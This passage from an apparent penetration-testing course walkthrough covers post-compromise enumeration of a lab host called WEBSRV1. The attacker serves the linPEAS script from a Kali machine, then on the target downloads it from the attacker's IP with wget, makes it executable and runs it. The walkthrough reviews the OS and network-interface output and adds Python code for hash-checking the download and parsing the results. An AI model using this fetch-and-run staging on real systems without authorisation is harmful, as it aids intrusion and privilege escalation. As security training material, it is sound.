In the previous section, we gained access to the target machine WEBSRV1. In this section, we'll perform local enumeration to identify attack vectors and sensitive information and attempt to elevate our privileges.
Because penetration tests are usually time-boxed, let's use the linPEAS automated Linux enumeration script to collect a broad range of information quickly and identify any potential low-hanging fruit.
To do this, let's copy linpeas.sh to the websrv1 directory and start a Python3 web server to serve it.
kali@kali:~/beyond/websrv1$ cp /usr/share/peass/linpeas/linpeas.sh .
kali@kali:~/beyond/websrv1$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
In our SSH session, we can use wget to download the enumeration script. In addition, we'll use chmod to make the script executable.
daniela@websrv1:~$ wget http://192.168.119.5/linpeas.sh
daniela@websrv1:~$ chmod a+x ./linpeas.sh
Now, we can run the script and start the enumeration.
daniela@websrv1:~$ ./linpeas.sh
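The staging step above (serve a file with Python's built-in web server, fetch it on the target, mark it executable) has one check a practitioner will want that the commands alone do not give: confirming that the script that arrived is byte-for-byte the one that was served. The following is an added example, not part of the original walkthrough and not linPEAS or OffSec code. It uses the same `http.server` machinery as `python3 -m http.server`, bound to the loopback address for the demo, and assumes the operator records the SHA-256 of the file on the serving side before staging it. The file name and contents are constructed.

```python
import hashlib
import os
import stat
import tempfile
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from urllib.request import urlopen


def sha256_file(path):
    """Stream a file through SHA-256; the same value `sha256sum` prints."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_and_mark_executable(path, expected_sha256):
    """Equivalent of `chmod a+x` gated on an integrity check.

    Returns True and sets the execute bits only when the downloaded file's
    hash matches the value recorded on the serving side; otherwise the file
    is left non-executable and False is returned.
    """
    if sha256_file(path) != expected_sha256.lower():
        return False
    mode = os.stat(path).st_mode
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return True


def is_executable(path):
    return bool(os.stat(path).st_mode & stat.S_IXUSR)


def serve_directory(directory, host="127.0.0.1", port=0):
    """Same mechanism as `python3 -m http.server`, run in a background thread.

    port=0 lets the OS pick a free port; the chosen port is in srv.server_address.
    """
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    srv = ThreadingHTTPServer((host, port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(url, dest):
    """Minimal stand-in for `wget URL`: write the response body to dest."""
    with urlopen(url) as resp, open(dest, "wb") as out:
        out.write(resp.read())
    return dest


if __name__ == "__main__":
    # Constructed stand-in for linpeas.sh; the real script is not embedded here.
    served_dir = tempfile.mkdtemp(prefix="serve_")
    target_dir = tempfile.mkdtemp(prefix="target_")
    script = os.path.join(served_dir, "linpeas.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\necho 'constructed placeholder for linpeas.sh'\n")

    expected = sha256_file(script)          # recorded on the serving side
    srv = serve_directory(served_dir)
    host, port = srv.server_address
    downloaded = fetch(f"http://{host}:{port}/linpeas.sh",
                       os.path.join(target_dir, "linpeas.sh"))
    ok = verify_and_mark_executable(downloaded, expected)
    srv.shutdown()
    print(f"integrity check: {'match' if ok else 'MISMATCH'}; "
          f"executable: {is_executable(downloaded)}")
```

A mismatch most often means a truncated transfer or a cached stale copy, but the same check also catches a file swapped on the serving host, which matters when the staging directory is shared between team members.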
Once the enumeration script has finished, let's review some of the results.
We'll begin with the system information.
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.15.0-48-generic (buildd@lcy02-amd64-080) (gcc (Ubuntu 11.2.0-19ubuntu1) 11.2.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022
Distributor ID:	Ubuntu
Description:	Ubuntu 22.04.1 LTS
Release:	22.04
Codename:	jammy
The listing confirms that the machine is running Ubuntu 22.04, as we had already identified via the OpenSSH service version.
Next, we'll review the network interfaces.
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:8a:26:5d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.50.244/24 brd 192.168.50.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe8a:265d/64 scope link
       valid_lft forever preferred_lft forever
The listing shows only one network interface (ens192) apart from the loopback interface. This means that the target machine is not connected to the internal network and we cannot use it as a pivot point.
Since we have already enumerated MAILSRV1 without any actionable results and this machine is not connected to the internal network, our path to a foothold there runs through sensitive information, such as credentials, on this host. Because reading other users' files and system data requires higher privileges, elevating our privileges becomes our priority.
The following linPEAS result section contains an interesting piece of information about commands that can be executed with sudo.
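Reading the "Operative system" and "Interfaces" sections by eye works for one host; across an assessment, or when the same output is collected for asset inventory on the defending side, it is worth parsing them into a host record so that the two conclusions drawn above (kernel and distribution release; whether the host is multi-homed and could reach another network) come out of code rather than a glance. The block below is an added example, not part of the original walkthrough and not linPEAS code. It assumes only that the sections keep the layout shown above: a `╔═══╣ Title` header line followed by raw `uname`/`lsb_release` and `ip a` output. The sample input is constructed to mirror the page's values, plus a second constructed host with two non-loopback interfaces so the multi-homed branch is exercised.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in linPEAS layout; values mirror the listing on the page.
SAMPLE = """\
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.15.0-48-generic (buildd@lcy02-amd64-080) (gcc (Ubuntu 11.2.0-19ubuntu1) 11.2.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022
Distributor ID:\tUbuntu
Description:\tUbuntu 22.04.1 LTS
Release:\t22.04
Codename:\tjammy

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:8a:26:5d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.50.244/24 brd 192.168.50.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe8a:265d/64 scope link
       valid_lft forever preferred_lft forever
"""

# Constructed second host (hypothetical, not on the page) with two NICs.
SAMPLE_MULTIHOMED = """\
╔══════════╣ Interfaces
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
    inet 127.0.0.1/8 scope host lo
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
    inet 192.168.50.250/24 brd 192.168.50.255 scope global ens192
3: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
    inet 172.16.6.250/24 brd 172.16.6.255 scope global ens224
"""

SECTION_RE = re.compile(r"^╔═+╣\s*(.+?)\s*$")
KERNEL_RE = re.compile(r"^Linux version (\S+)")
IFACE_RE = re.compile(r"^\d+: ([^:@]+)(?:@\S+)?: <([^>]*)>")
INET_RE = re.compile(r"^\s*inet (\d+\.\d+\.\d+\.\d+)/(\d+)")


@dataclass
class Interface:
    name: str
    flags: list
    addrs: list = field(default_factory=list)  # (ipv4, prefix_len)


@dataclass
class HostRecord:
    kernel: str = ""
    distro: str = ""
    release: str = ""
    interfaces: list = field(default_factory=list)

    def non_loopback(self):
        return [i for i in self.interfaces if "LOOPBACK" not in i.flags]

    def is_multi_homed(self):
        """True when more than one non-loopback interface exists: the host
        may bridge two networks and deserves a closer look as a pivot."""
        return len(self.non_loopback()) > 1


def split_sections(text):
    """Group lines under the linPEAS box-drawing section header they follow."""
    sections, current = {}, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections


def parse_linpeas(text):
    rec = HostRecord()
    sections = split_sections(text)
    for line in sections.get("Operative system", []):
        m = KERNEL_RE.match(line)
        if m:
            rec.kernel = m.group(1)
        elif line.startswith("Distributor ID:"):
            rec.distro = line.split(":", 1)[1].strip()
        elif line.startswith("Release:"):
            rec.release = line.split(":", 1)[1].strip()
    current = None
    for line in sections.get("Interfaces", []):
        m = IFACE_RE.match(line)
        if m:  # new "N: name: <FLAGS>" block from `ip a`
            current = Interface(m.group(1), m.group(2).split(","))
            rec.interfaces.append(current)
            continue
        m = INET_RE.match(line)
        if m and current is not None:
            current.addrs.append((m.group(1), int(m.group(2))))
    return rec


def summarize(rec):
    nics = ", ".join(f"{i.name} {a}/{p}" for i in rec.non_loopback() for a, p in i.addrs)
    pivot = "possible pivot (multi-homed)" if rec.is_multi_homed() else "not a pivot"
    return f"{rec.distro} {rec.release} kernel {rec.kernel}; NICs: {nics}; {pivot}"


if __name__ == "__main__":
    print(summarize(parse_linpeas(SAMPLE)))
    print(summarize(parse_linpeas(SAMPLE_MULTIHOMED)))
```

The `LOOPBACK` flag, not the interface name, decides what counts as loopback, so renamed or additional loopback devices are handled; `INET_RE` deliberately matches only `inet ` and skips `inet6` lines, since link-local IPv6 on every interface would otherwise make every host look routable.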